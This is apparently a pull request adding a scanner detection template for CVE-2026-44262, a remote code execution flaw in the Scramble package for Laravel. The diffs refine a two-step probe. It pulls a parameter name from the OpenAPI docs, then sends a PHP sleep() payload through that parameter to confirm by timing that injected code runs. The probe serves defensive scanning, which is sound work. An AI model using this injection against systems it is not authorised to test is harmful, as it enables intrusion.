### PR TITLE
Add CVE-2026-44262 — dedoc/scramble unauthenticated RCE

### DIFF
--- a/http/cves/2026/CVE-2026-44262.yaml
+++ b/http/cves/2026/CVE-2026-44262.yaml
@@ -19,7 +19,10 @@ info:
     cvss-score: 9.4
     cve-id: CVE-2026-44262
     cwe-id: CWE-94
-  tags: cve,cve2026,laravel,scramble,php,rce,unauthenticated
+  metadata:
+    verified: true
+    max-request: 2
+  tags: cve,cve2026,laravel,scramble,php,rce
 
 flow: http(1) && http(2)
 
@@ -27,24 +30,27 @@ http:
   - method: GET
     path:
       - "{{BaseURL}}/docs/api.json"
+      - "{{BaseURL}}/docs/api"
 
+    stop-at-first-match: true
     extractors:
       - type: regex
         name: name
         part: body
+        group: 1
         regex:
           - '"name"\s*:\s*"([^"]+)"[\s\S]{1,600}"default"\s*:\s*"[^"]*\|[^"]*"'
-        group: 1
         internal: true
 
   - raw:
       - |
-        @timeout: 10s
-        GET /docs/api.json?{{name}}=sleep(6) HTTP/1.1
+        @timeout: 30s
+        GET /docs/api.json?{{name}}=sleep(8) HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - "duration >= 6"
+          - "duration >= 8"
           - "status_code == 200"
+        condition: and

--- a/http/cves/2026/CVE-2026-44262.yaml
+++ b/http/cves/2026/CVE-2026-44262.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-44262
+
+info:
+  name: dedoc/scramble - Unauthenticated Remote Code Execution
+  author: joshuavanderpoll
+  severity: critical
+  description: |
+    dedoc/scramble >=0.13.2 <0.13.22 is vulnerable to RCE via its OpenAPI doc
+    generator. When a controller assigns $request->input() to a variable named
+    $code and uses it in validate(), Scramble's NodeRulesEvaluator calls
+    extract($variables) before eval("return $code;"), allowing an attacker to
+    overwrite $code with arbitrary PHP via a query parameter.
+
+    Detection uses a timing probe (sleep) — no destructive exploitation.
+  reference:
+    - https://github.com/joshuavanderpoll/CVE-2026-44262
+    - https://github.com/advisories/GHSA-4rm2-28vj-fj39
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
+    cvss-score: 9.4
+    cve-id: CVE-2026-44262
+    cwe-id: CWE-94
+  tags: cve,cve2026,rce,laravel,scramble,php
+  metadata:
+    verified: true
+
+flow: |
+  http(1);
+  try {
+    if (template["vuln_param"]) {
+      http(2);
+    }
+  } catch(e) {}
+
+http:
+  # Step 1: extract vulnerable param name — no matchers, just detection
+  # extractor looks for a query param whose default resembles a Laravel validation rule
+  - method: GET
+    path:
+      - "{{BaseURL}}/docs/api.json"
+
+    extractors:
+      - type: regex
+        name: vuln_param
+        internal: true
+        # match "name": "X" followed within 300 chars by "default": "...|..." (rule-like)
+        regex:
+          - '"name"\s*:\s*"([^"]+)"[\s\S]{1,600}"default"\s*:\s*"[^"]*\|[^"]*"'
+        group: 1
+        part: body
+
+  # Step 2: timing probe — only runs if vuln_param was found
+  # sleep(4) triggers if eval() executes attacker input, causing a ~4s delay
+  - method: GET
+    path:
+      - "{{BaseURL}}/docs/api.json?{{vuln_param}}=sleep(4)"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration >= 3"

--- a/http/cves/2026/CVE-2026-44262.yaml
+++ b/http/cves/2026/CVE-2026-44262.yaml
@@ -1,61 +1,50 @@
 id: CVE-2026-44262
 
 info:
-  name: dedoc/scramble - Unauthenticated Remote Code Execution
+  name: Scramble Laravel - Remote Code Execution
   author: joshuavanderpoll
   severity: critical
   description: |
-    dedoc/scramble >=0.13.2 <0.13.22 is vulnerable to RCE via its OpenAPI doc
-    generator. When a controller assigns $request->input() to a variable named
-    $code and uses it in validate(), Scramble's NodeRulesEvaluator calls
-    extract($variables) before eval("return $code;"), allowing an attacker to
-    overwrite $code with arbitrary PHP via a query parameter.
-
-    Detection uses a timing probe (sleep) — no destructive exploitation.
+    Scramble for Laravel >= 0.13.2 and < 0.13.22 contains a remote code execution caused by evaluation of user-controlled input in validation rules during documentation generation, letting remote attackers execute arbitrary PHP code, exploit requires publicly accessible documentation endpoints.
+  impact: |
+    Remote attackers can execute arbitrary PHP code, potentially leading to full application compromise.
+  remediation: |
+    Upgrade to version 0.13.22 or later.
   reference:
-    - https://github.com/joshuavanderpoll/CVE-2026-44262
     - https://github.com/advisories/GHSA-4rm2-28vj-fj39
+    - https://github.com/joshuavanderpoll/CVE-2026-44262
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-44262
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
     cvss-score: 9.4
     cve-id: CVE-2026-44262
     cwe-id: CWE-94
-  tags: cve,cve2026,rce,laravel,scramble,php
-  metadata:
-    verified: true
+  tags: cve,cve2026,laravel,scramble,php,rce,unauthenticated
 
-flow: |
-  http(1);
-  try {
-    if (template["vuln_param"]) {
-      http(2);
-    }
-  } catch(e) {}
+flow: http(1) && http(2)
 
 http:
-  # Step 1: extract vulnerable param name — no matchers, just detection
-  # extractor looks for a query param whose default resembles a Laravel validation rule
   - method: GET
     path:
       - "{{BaseURL}}/docs/api.json"
 
     extractors:
       - type: regex
-        name: vuln_param
-        internal: true
-        # match "name": "X" followed within 300 chars by "default": "...|..." (rule-like)
+        name: name
+        part: body
         regex:
           - '"name"\s*:\s*"([^"]+)"[\s\S]{1,600}"default"\s*:\s*"[^"]*\|[^"]*"'
         group: 1
-        part: body
+        internal: true
 
-  # Step 2: timing probe — only runs if vuln_param was found
-  # sleep(4) triggers if eval() executes attacker input, causing a ~4s delay
-  - method: GET
-    path:
-      - "{{BaseURL}}/docs/api.json?{{vuln_param}}=sleep(4)"
+  - raw:
+      - |
+        @timeout: 10s
+        GET /docs/api.json?{{name}}=sleep(6) HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - "duration >= 3"
+          - "duration >= 6"
+          - "status_code == 200"


### PR DESCRIPTION
### PR Information

- Added CVE-2026-44262 — dedoc/scramble Unauthenticated Remote Code Execution
- References:
  - https://github.com/joshuavanderpoll/CVE-2026-44262
  - https://github.com/advisories/GHSA-4rm2-28vj-fj39

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Validated against a Docker lab running dedoc/scramble 0.13.21 (vulnerable).
Validated against a localhosted website running the patched version
Two-step detection: extracts the vulnerable query parameter from the OpenAPI spec,
then confirms RCE via a sleep(4) timing probe (~4s delay observed).

Docker lab: https://github.com/joshuavanderpoll/CVE-2026-44262/tree/main/docker